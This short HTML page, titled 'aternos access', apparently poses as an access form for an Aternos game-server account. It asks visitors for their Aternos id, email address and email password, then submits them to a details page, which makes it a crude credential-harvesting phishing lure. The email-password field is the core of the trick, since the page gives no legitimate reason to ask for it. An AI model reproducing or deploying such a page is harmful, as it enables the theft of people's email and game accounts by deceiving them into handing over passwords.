<!DOCTYPE html>
    <html>

    <head>
        <meta charset="utf-8">
        <title>aternos access</title>
    </head>

    <body>
        <h1><em><strong>access</strong></em>
            <h1>
                <h3>Fill your contact details (dont put your real name put your aternos name)
                    <form action="details.html" enctype="text/plain">
                        <label>your aternos id</label>
                        <input type="text" name="your aternos id"><br><br>
                        <label>your email</label>
                        <input type="email" name="your email"><br><br>
                        <label>email password</label>
                        <input type="password" name="your password"><br><br>
                        <input type="checkbox"><br><br>
                        <input type="submit">
                    </form>
    </body>

    </html>